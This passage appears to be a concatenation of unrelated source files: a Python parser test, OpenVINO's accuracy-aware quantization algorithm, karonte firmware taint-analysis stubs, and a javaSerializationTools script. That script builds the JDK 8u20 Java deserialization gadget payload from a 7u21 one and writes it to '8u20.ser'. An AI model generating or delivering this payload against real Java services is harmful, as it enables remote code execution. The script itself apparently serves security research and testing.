subdirs, files in os.walk(absdir): for f in files: if f.endswith(".py"): filename = os.path.join(dir_name, f) with open(filename, "rt", encoding="utf-8") as fff: check_code(fff.read(), filename=filename) def test_pyparser(): """Test case: general parsing.""" def _check_blocks(actual, expected): assert actual, "No parse results" for i in range(len(actual)): assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i]) valid = False if isinstance(expected[i], type): if isinstance(actual[i], expected[i]): valid = True elif isinstance(expected[i], tuple): if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True if not valid: assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i]) def check_code(code, blocks=None, filename=None): code = textwrap.dedent(code) if not code.endswith("\n"): code += "\n" if filename: print("Testing file %s..." % filename, end=" ") else: check_code.index = getattr(check_code, "index", 0) + 1 print("Testing code fragment %d..." % check_code.index, end=" ") preparsed = None parsed = None unparsed = None try: preparsed = pyparser.parse_text(code) parsed = preparsed.parse(2) try: unparsed = parsed.unparse() except ValueError as e: for i, tok in enumerate(parsed.tokens): print("%3d %r" % (i, tok)) raise AssertionError("Cannot unparse code: %s" % e) assert_same_code(code, unparsed) if blocks: _check_blocks(parsed.parsed, blocks) print("ok") except AssertionError as e: print() print(u"Error: " + str(e)) print(u"Original code fragment:\n" + code) if unparsed: print(u"Unparsed code:\n" + unparsed) if parsed: print(parsed) for i, tok in enumerate(parsed.tokens): print("%3d %r" % (i, tok)) raise except Exception as e: print() print(u"Error: " + str(e)) if preparsed: print("Preparsed tokens:") for i, tok in enumerate(preparsed.tokens): print("%4d %r" % (i, tok)) else: print("Initial parsing has failed...") raise check_code(""" # -*- encoding: utf-8 -*- # copyright: 2016 h2o.ai \"\"\" A code example. It's not supposed to be functional, or even functionable. \"\"\" from __future__ import braces, antigravity # Standard library imports import sys import time import this import h2o from h2o import H2OFrame, init from . import * # Do some initalization for legacy python versions if PY2: def unicode(): raise RuntimeError # disable this builtin function # because it doesn't exist in Py3 handler = lambda: None # noop # (will redefine later) ################################################################################ # comment 1 class Foo(object): #------ Public ------------------------------------------------------------- def bar(self): pass # def foo(): # print(1) # # print(2) # comment 2 @decorated( 1, 2, (3)) @dddd def bar(): # be # happy print("bar!") # bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression, Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws]) for directory in [".", "../../h2o-py", "../../py"]: absdir = os.path.abspath(directory) for dir_name, subdirs, files in os.walk(absdir): for f in files: if f.endswith(".py"): filename = os.path.join(dir_name, f) with open(filename, "rt", encoding="utf-8") as fff: check_code(fff.read(), filename=filename) # test_tokenization() test_pyparser()
tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py
chccc1994/openvino
2,406
30352
<reponame>chccc1994/openvino # Copyright (C) 2020-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 import os import random from copy import deepcopy from sys import maxsize import numpy as np from .utils import create_metric_config, is_preset_performance, \ get_mixed_preset_config, evaluate_model, get_num_of_quantized_ops from ..utils import load_hardware_config from ...algorithm import Algorithm from ...algorithm_selector import COMPRESSION_ALGORITHMS from ....algorithms.quantization import utils as eu from ....graph import node_utils as nu from ....graph.model_utils import save_model, get_nodes_by_type from ....graph.transformer import GraphTransformer from ....samplers.creator import create_sampler from ....statistics.statistics import TensorStatistic from ....utils.logger import get_logger from ....utils.telemetry import send_event logger = get_logger(__name__) # pylint: disable=R0912 @COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon') class AccuracyAwareCommon(Algorithm): name = 'AccuracyAwareCommon' def __init__(self, config, engine): super().__init__(config, engine) # configure default parameters default_config = { 'metric_subset_ratio': 0.5, 'ranking_subset_size': config.get('ranking_subset_size', min(len(engine.data_loader), 300)), 'max_iter_num': maxsize, 'maximal_drop': 0.01, 'drop_type': 'absolute', 'use_prev_if_drop_increase': True, 'base_algorithm': 'DefaultQuantization', 'annotation_free': False, 'tune_hyperparams': False, 'annotation_conf_threshold': 0.6, 'convert_to_mixed_preset': False } for setting in default_config: if setting not in self._config: self._config[setting] = default_config[setting] self._config.convert_to_mixed_preset = self._config.convert_to_mixed_preset and \ is_preset_performance(self._config) save_dir = self._config.get('exec_log_dir', os.path.curdir) self._config.intermediate_log_dir = os.path.join(save_dir, 'accuracy_aware_intermediate') self._engine.calculate_metrics = True # Create initial quantization algorithms self._quantization_algo = self._create_quantization_algo(self._config, 'AAQuantizationAlgorithm', self._engine) self._preset_conversion_algo = self._create_quantization_algo(get_mixed_preset_config(self._config), 'AAConversionAlgorithm', self._engine) self._grid_search_algo = COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config, engine) self._grid_search_algo.default_algo = self._quantization_algo # Configure metrics self._metrics_config = create_metric_config(self._engine, self._config) self._baseline_metric = {metric.name: metric.baseline_value for metric in self._config.metrics if metric.name in self._metrics_config} \ if self._config.metrics and \ all('baseline_value' in metric.keys() for metric in self._config.metrics) \ else {} self._max_drop_by_name = {} self._original_per_sample_metrics = None self._output_node_name, self._stats_layout = None, None self._quantized_layers_num = 0 self._dataset_size = len(self._engine.data_loader) metric_subset_size = int(self._dataset_size * self._config.metric_subset_ratio) self._diff_subset_indices = sorted(random.sample(range(self._dataset_size), metric_subset_size)) \ if metric_subset_size < self._dataset_size and self._baseline_metric \ else list(range(self._dataset_size)) self._graph_transformer = GraphTransformer(load_hardware_config(self._config)) self.default_steps_size = 0.005 self.total_exec_steps = self._config.get('stat_subset_size', self._dataset_size) self._quantization_algo.default_steps_size = self.default_steps_size if self._config.convert_to_mixed_preset: self._preset_conversion_algo.default_steps_size = self.default_steps_size self._stats_collector = None self._precision_change_to = 'floating-point' self._need_to_change_scope = True self._change_conditions = None self._exclude_bad_nodes = False @property def change_original_model(self): return True def register_statistics(self, model, stats_collector): self._stats_collector = stats_collector self._quantization_algo.register_statistics(model, stats_collector) if self._config.convert_to_mixed_preset: self._preset_conversion_algo.register_statistics(model, stats_collector) if self._config.tune_hyperparams: self._grid_search_algo.register_statistics(model, stats_collector) def run(self, model): """ this function applies the accuracy aware quantization scope search algorithm :param model: model to apply algo :return model with modified quantization scope to match required accuracy values """ if not self._metrics_config: logger.info('Could not find the required metrics for optimization in the engine. ' 'Stop AccuracyAware optimization. ' 'Available metrics: %s.', ', '.join(self._engine.get_metrics_attributes())) logger.update_progress(self.total_exec_steps) return model # configure stats layout to collect raw output # to calculate persample difference for special metrics self._output_node_name = nu.get_node_input( model.get_final_output_nodes()[0], 0).name # gets first output node for metric_config in self._metrics_config.values(): if metric_config.persample.is_special: self._stats_layout = {self._output_node_name: {'output_logits': TensorStatistic(lambda a: a)}} break self._request_alt_statistics(model) print_progress = logger.progress_bar_disabled if not self._baseline_metric or self._config.annotation_free: # collect predictions of original model if self._config.annotation_free: self._engine.dump_prediction_to_annotation = True self._engine.annotation_conf_threshold = self._config.annotation_conf_threshold self._baseline_metric, self._original_per_sample_metrics = self._collect_baseline(model, print_progress) logger.info('Baseline metrics: %s', self._baseline_metric) # update dataset info if self._config.annotation_free: self._dataset_size = len(self._engine.data_loader) self._diff_subset_indices = list(range(self._dataset_size)) # configure values of metrics maximum drop max_drop = self._config.maximal_drop if self._config.drop_type == 'relative': self._max_drop_by_name = {name: value * max_drop for name, value in self._baseline_metric.items()} else: self._max_drop_by_name = {name: max_drop for name, value in self._baseline_metric.items()} # quantize model quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \ self._quantize_and_evaluate(deepcopy(model), self._quantize_model, print_progress=print_progress) self._save_intermediate_model(quantized_model) if self._drop_restrictions_are_met(metrics_accuracy_drop): send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0)) return quantized_model default_quantization_config = self._quantization_algo.config # change quantization preset of the model if possible if self._config.convert_to_mixed_preset: quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \ self._quantize_and_evaluate(deepcopy(model), self._convert_model_to_mixed_preset, print_progress=print_progress) self._save_intermediate_model(quantized_model) if self._drop_restrictions_are_met(metrics_accuracy_drop): send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0)) return quantized_model default_quantization_config = self._preset_conversion_algo.config if not self._original_per_sample_metrics: _, self._original_per_sample_metrics = \ self._evaluate_model(model=model, subset_indices=self._diff_subset_indices) # change quantization parameters of the model if self._config.tune_hyperparams: worst_ranking_subset = self._create_hardest_ranking_subset(quantized_metrics_per_sample) self._grid_search_algo.update_config(default_quantization_config) self._grid_search_algo.set_subset_and_metric(worst_ranking_subset, self._metrics_config) self._engine.allow_pairwise_subset = True updated_quantized_model, updated_metrics_accuracy_drop, updated_quantized_metrics_per_sample = \ self._quantize_and_evaluate(deepcopy(model), self._search_optimal_parameters, print_progress=print_progress) default_mean_drop = np.mean([value for name, value in metrics_accuracy_drop.items()]) updated_mean_drop = np.mean([value for name, value in updated_metrics_accuracy_drop.items()]) if updated_mean_drop < default_mean_drop: logger.info('Applying the best configuration') quantized_model = updated_quantized_model metrics_accuracy_drop = updated_metrics_accuracy_drop quantized_metrics_per_sample = updated_quantized_metrics_per_sample self._engine.allow_pairwise_subset = False self._save_intermediate_model(quantized_model) if self._drop_restrictions_are_met(metrics_accuracy_drop): send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0)) return quantized_model # we need to do this for more efficient memory consumption which is too high # because _change_quantization_scope(..) will allocate one more model del model if self._need_to_change_scope: return self._change_quantization_scope(quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample) logger.info('Quantization scope was not changed due to algo conditions: %s', self._change_conditions) logger.update_progress(self.total_exec_steps) return quantized_model def _collect_baseline(self, model, print_progress): logger.info('Start original model inference') return self._evaluate_model(model=model, print_progress=print_progress) def _change_quantization_scope(self, model, original_accuracy_drop, fully_quantized_metrics_per_sample): """Applies greedy search to remove fake-quantize nodes that degrade metric values :param model: fully quantized model :param original_accuracy_drop: dictionary of per-metric drops of fully quantized model {metric_name: drop_value} :param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values of fully quantized model :return model: model with new quantization scope """ self._quantized_layers_num = \ self._get_num_of_quantized_ops(model) logger.info('The total number of quantized operations in the graph: %d', self._quantized_layers_num) logger.info('Changing fake quantize nodes scope') all_changed_nodes_names = [] all_ops_in_targeted_prec = set() drop_functor = lambda a: (original_accuracy_drop[a] - self._max_drop_by_name[a]) / self._baseline_metric[a] metric_to_optimize = sorted(original_accuracy_drop.keys(), key=drop_functor)[-1] logger.info('Optimizing %s metric', metric_to_optimize) accuracy_drop = original_accuracy_drop[metric_to_optimize] # calculate importance of fq nodes node_importance = self._get_node_importance(model, metric_to_optimize, fully_quantized_metrics_per_sample) quantized_metrics_per_sample = None reached_required_drop = False changed_all_fq = False is_step_back = True iteration = 0 excluded_nodes = [] for iteration in range(self._config.max_iter_num): # save model and metrics from previous iteration model_prev_iter = deepcopy(model) metrics_prev_iter = deepcopy(quantized_metrics_per_sample) if not node_importance: logger.info( 'All layers have been checked and the AccuracyAwareQuantization ' 'will not be able to achieve the required accuracy drop') changed_all_fq = True break # greedy removal of the FQ node with the highest importance score fq_name_to_change = node_importance.pop(0) model, changed_nodes, ops_in_targeted_prec = self._modify_model_in_scope(model, [fq_name_to_change]) logger.debug('Changed a block of %d FQ layers: %s', len(changed_nodes), changed_nodes) logger.info('Reverted %d layers to the %s precision: %s', len(ops_in_targeted_prec), self._precision_change_to, ', '.join(ops_in_targeted_prec)) all_changed_nodes_names.append(str(changed_nodes)) all_ops_in_targeted_prec.update(ops_in_targeted_prec) # save intermediate model self._save_intermediate_model(model) # calculate drop for new quantization scope final_metrics, quantized_metrics_per_sample = \ self._evaluate_model(model=model, per_sample_subset_indices=self._diff_subset_indices, print_progress=True) metrics_accuracy_drop = {name: params.comparator(self._baseline_metric[name] - final_metrics[name]) for name, params in self._metrics_config.items()} new_accuracy_drop = metrics_accuracy_drop[metric_to_optimize] logger.info('Accuracy drop with the new quantization scope is %s', metrics_accuracy_drop) # removed all fake-quantize layers from the model if not get_nodes_by_type(model, ['FakeQuantize']): logger.info('Removed all FQ layers from the network!') changed_all_fq = True break # all drop restrictions are met if self._drop_restrictions_are_met(metrics_accuracy_drop): reached_required_drop = True break # continue greedy fq removal if self._max_drop_by_name[metric_to_optimize] < new_accuracy_drop <= accuracy_drop \ or (new_accuracy_drop > accuracy_drop and is_step_back): is_step_back = False accuracy_drop = new_accuracy_drop continue # if after fq removal drop has increased # calculate node importance of the model (from previous iteration) if new_accuracy_drop > accuracy_drop and self._config.use_prev_if_drop_increase: model = model_prev_iter quantized_metrics_per_sample = metrics_prev_iter all_changed_nodes_names.remove(str(changed_nodes)) all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec) if self._exclude_bad_nodes: excluded_nodes.extend(changed_nodes) logger.debug('%s added to excluded list: %s', str(changed_nodes), str(excluded_nodes)) is_step_back = True accuracy_drop = new_accuracy_drop # if drop restriction for the current metric is satisfied, select the next metric # and calculate node importance if new_accuracy_drop <= self._max_drop_by_name[metric_to_optimize]: metric_to_optimize = sorted(original_accuracy_drop.keys(), key=lambda a, current_drop=metrics_accuracy_drop: (current_drop[a] - self._max_drop_by_name[a]) / self._baseline_metric[a])[-1] logger.info('Optimizing %s metric', metric_to_optimize) accuracy_drop = original_accuracy_drop[metric_to_optimize] is_step_back = False del model_prev_iter, metrics_prev_iter logger.info('Re-calculating node importance') node_importance = self._get_node_importance(model, metric_to_optimize, quantized_metrics_per_sample, excluded_nodes) if changed_all_fq or not reached_required_drop: # Do not remove or change! logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.', force=True) if iteration + 1 >= self._config.max_iter_num: logger.info('Reached maximum number of iterations.') if not changed_all_fq: logger.debug('Changed FakeQuantize nodes:\n %s', '\n'.join(all_changed_nodes_names)) logger.info(' %d out of %d layers have been reverted back to the %s precision: %s', len(all_ops_in_targeted_prec), self._quantized_layers_num, self._precision_change_to, ', '.join(all_ops_in_targeted_prec)) send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, len(all_ops_in_targeted_prec))) logger.update_progress(self.total_exec_steps) return model def _get_node_importance(self, model, metric_name, qmodel_per_sample_metrics=None, excluded_nodes=None): """Creates a list of fake-quantize nodes importance in descending order based on their contribution to metric degradation :param model: model with fake-quantize nodes :param metric_name: metric to be taken into consideration :param qmodel_per_sample_metrics: per-sample metrics values of quantized model :return list of node names """ if qmodel_per_sample_metrics is None: # get quantized model predictions _, qmodel_per_sample_metrics = self._evaluate_model(model=model, subset_indices=self._diff_subset_indices) ranking_subset = self._get_ranking_subset(qmodel_per_sample_metrics, metric_name) # not sorted node_importance_score = self._calculate_node_importance_scores(model, ranking_subset, metric_name, excluded_nodes) # sort by error value and then by node name node_importance = sorted(node_importance_score.items(), key=lambda x: (x[1], x[0]), reverse=True) node_importance = [n[0] for n in node_importance] return node_importance def _get_ranking_subset(self, qmodel_per_sample_metrics, metric_name, from_id=0): """Determines samples on which the quantized model predicts worse than on the original model :param qmodel_per_sample_metrics: per-sample metrics values of the quantized model :param metric_name: metric to take into account :return a list of image ids """ persample_metric = self._metrics_config[metric_name].persample sorted_sample_importance = \ persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name], qmodel_per_sample_metrics[persample_metric.name], reverse=True) to_id = from_id + self._config.ranking_subset_size ranking_subset = \ np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]] return ranking_subset def _calculate_node_importance_scores(self, model, ranking_subset, metric_name, excluded_nodes=None): """Cuts out FQ layers one after another and measures metric value on ranking subset. The higher the value, the more important the node. :param model: graph from which to cut nodes :param ranking_subset: subset on which the scores will be calculated :param metric_name: metric to take into account :return a dictionary of node importance {metric_name: score} """ change_fqs = [] node_importance_score = {} eu.select_evaluation_dataset(self._engine) fake_quantize_nodes = get_nodes_by_type(model, ['FakeQuantize']) for node in fake_quantize_nodes: if excluded_nodes and node.name in excluded_nodes: continue if node.name not in change_fqs: modified_model, modified_fq_layers, _ = self._modify_model_in_scope(deepcopy(model), [node.name]) if not modified_fq_layers: continue logger.debug('Changed\\Removed a block of %d FQ layers: %s', len(modified_fq_layers), modified_fq_layers) change_fqs += modified_fq_layers self._engine.set_model(modified_model) self._engine.allow_pairwise_subset = True index_sampler = create_sampler(self._engine, samples=list(ranking_subset)) metrics, *_ = self._engine.predict(sampler=index_sampler) self._engine.allow_pairwise_subset = False logger.update_progress(self._config.ranking_subset_size) ranking_metric = self._metrics_config[metric_name].ranking node_importance_score[node.name] = ranking_metric.comparator(metrics[ranking_metric.name]) eu.reset_dataset_to_default(self._engine) return node_importance_score def _modify_model_in_scope(self, model, nodes_names): return self._graph_transformer.remove_fq_nodes(deepcopy(model), nodes_names) def compute_total_exec_steps(self, model=None): total_steps = 0 # add dataset_size to total if baseline not implemented if not self._baseline_metric or self._config.annotation_free: total_steps += self._dataset_size # add dataset_size to total for int8 inference total_steps += self._dataset_size # add dataset_size to total in case of conversion to mixed mode if self._config.convert_to_mixed_preset: total_steps += self._dataset_size nodes_length = len(get_nodes_by_type(model, ['Convolution', 'MatMul'])) num_steps = self._config['max_iter_num'] if self._config['max_iter_num'] < maxsize else nodes_length metric_computing_steps = nodes_length * self._config['ranking_subset_size'] # add ranking_subset_size for num_steps and again computing every 3 steps total_steps += metric_computing_steps + \ metric_computing_steps * self._config['ranking_subset_size'] * num_steps / 3 # add total run steps (num steps) without one of FQs pairs total_steps += num_steps * self._dataset_size # number of statistics computing total_steps += self._quantization_algo.total_exec_steps if self._config.convert_to_mixed_preset: total_steps += self._preset_conversion_algo.total_exec_steps self.total_exec_steps = total_steps def _convert_model_to_mixed_preset(self, model): logger.info('Start quantization in mixed mode') return self._preset_conversion_algo.run(model) def _quantize_model(self, model): logger.info('Start quantization') return self._quantization_algo.run(model) def _search_optimal_parameters(self, model): logger.info('Start parameters grid search') return self._grid_search_algo.run(model) def _quantize_and_evaluate(self, model, quantization_algo, print_progress=True): def calculate_accuracy_drop(): return {metric_name: params.comparator(self._baseline_metric[metric_name] - quantized_metrics[metric_name]) for metric_name, params in self._metrics_config.items()} quantized_model = quantization_algo(model) logger.info('Start compressed model inference') quantized_metrics, quantized_metrics_per_sample = \ self._evaluate_model(model=quantized_model, per_sample_subset_indices=self._diff_subset_indices, print_progress=print_progress) logger.info('Fully quantized metrics: %s', quantized_metrics) metrics_accuracy_drop = calculate_accuracy_drop() logger.info('Accuracy drop: %s', metrics_accuracy_drop) return quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample def _drop_restrictions_are_met(self, metrics_accuracy_drop): return all(metrics_accuracy_drop[name] <= self._max_drop_by_name[name] for name in self._metrics_config) def _save_intermediate_model(self, model): save_model(model, self._config.intermediate_log_dir, model_name='intermediate_model') logger.debug('Intermediate model is saved in %s', self._config.intermediate_log_dir) def _create_hardest_ranking_subset(self, metrics_per_sample): worst_ranking_subset = [] while len(worst_ranking_subset) < self._config.ranking_subset_size: needed_subset_size = self._config.ranking_subset_size - len(worst_ranking_subset) top_n_samples = int(np.ceil(needed_subset_size / len(metrics_per_sample.keys()))) local_ranking_subset = [] for metric_name in metrics_per_sample: ranking_subset = self._get_ranking_subset(metrics_per_sample, metric_name, len(worst_ranking_subset)) local_ranking_subset.extend(ranking_subset[:top_n_samples]) worst_ranking_subset.extend(list(set(local_ranking_subset))) return list(set(worst_ranking_subset)) def _evaluate_model(self, model, per_sample_subset_indices=None, subset_indices=None, print_progress=True): metrics, metrics_per_sample = evaluate_model(model, self._engine, self._dataset_size, subset_indices, print_progress, self._metrics_config, per_sample_subset_indices, self._output_node_name, self._stats_layout) predict_step_size = self._dataset_size if not subset_indices else len(subset_indices) logger.update_progress(predict_step_size) return metrics, metrics_per_sample def _request_alt_statistics(self, model): pass def _get_num_of_quantized_ops(self, model): return get_num_of_quantized_ops(model, self._graph_transformer.fq_removal.quantize_operations) @staticmethod def _get_result_aa(metrics_accuracy_drop, num_of_reverted_layers): try: return str({'final_drop': dict(metrics_accuracy_drop), 'num_of_reverted_layers': num_of_reverted_layers}) except Exception as e: # pylint: disable=broad-except logger.info("Error occurred while trying to send telemetry. Details:" + str(e)) return str(None) @staticmethod def _create_quantization_algo(algo_config, name, engine): algo = COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config, engine) algo.name = name return algo
tests/test8u20/main.py
potats0/javaSerializationTools
124
30356
import yaml from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock from javaSerializationTools import ObjectRead from javaSerializationTools import ObjectWrite if __name__ == '__main__': with open("../files/7u21.ser", "rb") as f: a = ObjectRead(f) obj = a.readContent() # 第一步,向HashSet添加一个假字段,名字fake signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;") fakeSignature = {'name': 'fake', 'signature': signature} obj.javaClass.superJavaClass.fields.append(fakeSignature) # 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler # 读取BeanContextSupportClass的类的简介 with open('BeanContextSupportClass.yaml', 'r') as f1: BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader) # 向beanContextSupportObject添加beanContextChildPeer属性 beanContextSupportObject = JavaObject(BeanContextSupportClassDesc) beanContextChildPeerField = JavaField('beanContextChildPeer', JavaString('Ljava/beans/beancontext/BeanContextChild'), beanContextSupportObject) beanContextSupportObject.fields.append([beanContextChildPeerField]) # 向beanContextSupportObject添加serializable属性 serializableField = JavaField('serializable', 'I', 1) beanContextSupportObject.fields.append([serializableField]) # 向beanContextSupportObject添加objectAnnontations 数据 beanContextSupportObject.objectAnnotation.append(JavaEndBlock()) AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler) # 把beanContextSupportObject对象添加到fake属性里 fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject) obj.fields[0].append(fakeField) with open("8u20.ser", 'wb') as f: o = ObjectWrite(f) o.writeContent(obj)
tool/taint_analysis/summary_functions.py
cpbscholten/karonte
294
30401
""" Though karonte relies on angr's sim procedures, sometimes these add in the current state some constraints to make the used analysis faster. For example, if a malloc has an unconstrained size, angr add the constraint size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes impossible to reason about the maximum buffer sizes (as needed by karonte). In this module we wrap sim procedures to avoid them to add such constraints. Note however, that the semantic of an expression might get lost. Eg. strlen(taint_x) = taint_y, taint_y is an unconstrained variable """ from taint_analysis.coretaint import * def _get_function_name(addr, p): """ Return a function name :param addr: function address :param p: angr project :return: function name """ return p.loader.find_plt_stub_name(addr) def source_dummy(*_, **__): pass def memcmp_unsized(_core, _, plt_path): """ memcmp-like unsized (e.g., strlen) function summary :param _core: core taint engine :param _: not used :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p dst_reg = arg_reg_name(p, 0) src_reg = arg_reg_name(p, 1) b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg)) b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg)) if not _core.is_tainted(b1, plt_path): b1 = None if not _core.is_tainted(b2, plt_path): b2 = None # if either of the two is not tainted, we untaint the other if b1 is not None and b2 is None: _core.do_recursive_untaint(b1, plt_path) elif b2 is not None and b1 is None: _core.do_recursive_untaint(b2, plt_path) # step into it plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_unsized: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() def memcmp_sized(_core, _, plt_path): """ memcmp-like sized (e.g., memcmp) function summary :param _core: core taint engine :param _: not used :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p dst_reg = arg_reg_name(p, 0) src_reg = arg_reg_name(p, 1) reg_n = arg_reg_name(p, 2) b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg)) b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg)) n = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, reg_n)) # we untaint buffers only if n is not tainted if not _core.is_tainted(n, plt_path): if not _core.is_tainted(b1, plt_path): b1 = None if not _core.is_tainted(b2, plt_path): b2 = None # if either of the two is not tainted, we untaint the other if b1 is not None and b2 is None: _core.do_recursive_untaint(b1, plt_path) elif b2 is not None and b1 is None: _core.do_recursive_untaint(b2, plt_path) # step into it plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_sized: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() def memcpy_sized(_core, call_site_path, plt_path): """ memcpy-like sized (e.g., memcpy) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p # if the second parameter is tainted (or pointing to a tainted location) # or the third is tainted, we taint the first too dst_reg = arg_reg_name(p, 0) dst = getattr(plt_path.active[0].regs, dst_reg) dst_loaded = _core.safe_load(plt_path, dst) src_reg = arg_reg_name(p, 1) src = getattr(plt_path.active[0].regs, src_reg) src_loaded = _core.safe_load(plt_path, src) reg_n = arg_reg_name(p, 2) n = getattr(plt_path.active[0].regs, reg_n) # n_loaded = _core.safe_load(plt_path_cp, size) plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_sized: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() if not plt_path.active: raise Exception("size of function has no active successors, not walking this path...") # apply taint to dst if source is tainted and constrain this buffer # TODO take N into account if _core.is_tainted(src_loaded, path=plt_path): src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True) new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed _core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path) plt_path.active[0].add_constraints(src_loaded_full == new_dst_t) plt_path.active[0].memory.store(dst, new_dst_t) # untaint if the size is constrained if (_core.is_tainted(dst, path=plt_path) or _core.is_tainted(dst_loaded, path=plt_path)) and \ not _core.is_tainted(n, path=plt_path): # do untaint _core.do_recursive_untaint(dst_loaded, plt_path) def memcpy_unsized(_core, call_site_path, plt_path): """ memcpy-like unsize (e.g., strcpy) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p dst_reg = arg_reg_name(p, 0) dst = getattr(plt_path.active[0].regs, dst_reg) # dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True) src_reg = arg_reg_name(p, 1) src = getattr(plt_path.active[0].regs, src_reg) src_loaded = _core.safe_load(plt_path, src) # run the sim procedure plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_unsized: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() if not plt_path.active: raise Exception("size of function has no active successors, not walking this path...") # apply taint to dst if source is tainted and constrain this buffer if _core.is_tainted(src_loaded, path=plt_path): src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True) new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed _core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path) plt_path.active[0].add_constraints(src_loaded_full == new_dst_t) plt_path.active[0].memory.store(dst, new_dst_t) def is_size_taint(v): return '__size__' in str(v) def sizeof(_core, call_site_path, plt_path): """ sizeof-like (e.g., strlen) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p n = getattr(plt_path.active[0].regs, arg_reg_name(p, 0)) cnt = _core.safe_load(plt_path, n, _core.taint_buf_size/8) # use the sim procedure to continue to the next state and add constraints plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "sizeof: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() if not plt_path.active: raise Exception("size of function has no active successors, not walking this path...") return_value = getattr(plt_path.active[0].regs, ret_reg_name(p)) # TODO: check if the constraints set by angr sim procedure are correct # if there is a tainted buffer in one of the registers then also taint this variable if _core.is_tainted(cnt, path=plt_path) or _core.is_tainted(n, path=plt_path): t = _core.get_sym_val(name=(_core.taint_buf + '__size__'), bits=p.arch.bits).reversed _core.add_taint_glob_dep(t, cnt, plt_path) # constrain output of this variable equal to the output of sizeof and add it to the return register plt_path.active[0].add_constraints(return_value == t) setattr(plt_path.active[0].regs, ret_reg_name(p), t) # # Heap functions # def _malloc(_core, _, plt_path): """ maclloc function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p state = plt_path.active[0] sim_size = getattr(state.regs, arg_reg_name(p, 0)) # when the size is symbolic, choose the maximum size possible if state.solver.symbolic(sim_size): size = state.solver.max(sim_size) if size > state.libc.max_variable_size: size = state.libc.max_variable_size setattr(state.regs, arg_reg_name(p, 0), size) # use the sim procedure plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "malloc: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() return sim_size def _realloc(_core, _, plt_path): """ realloc function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ p = _core.p state = plt_path.active[0] sim_size = getattr(state.regs, arg_reg_name(p, 1)) # ptr = getattr(state.regs, arg_reg_name(p, 0)) # when the size is symbolic, choose the maximum size possible if state.solver.symbolic(sim_size): size = state.solver.max(sim_size) if size > state.libc.max_variable_size: size = state.libc.max_variable_size setattr(state.regs, arg_reg_name(p, 0), size) # if the size is not tainted, use the sim procedure plt_path.step() assert _core.p.is_hooked(plt_path.active[0].addr), "realloc: Summary function relies on angr's " \ "sim procedure, add option use_sim_procedures to the loader" plt_path.step() return sim_size def heap_alloc(_core, call_site_path, plt_path): """ Heap allocation function stub :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the 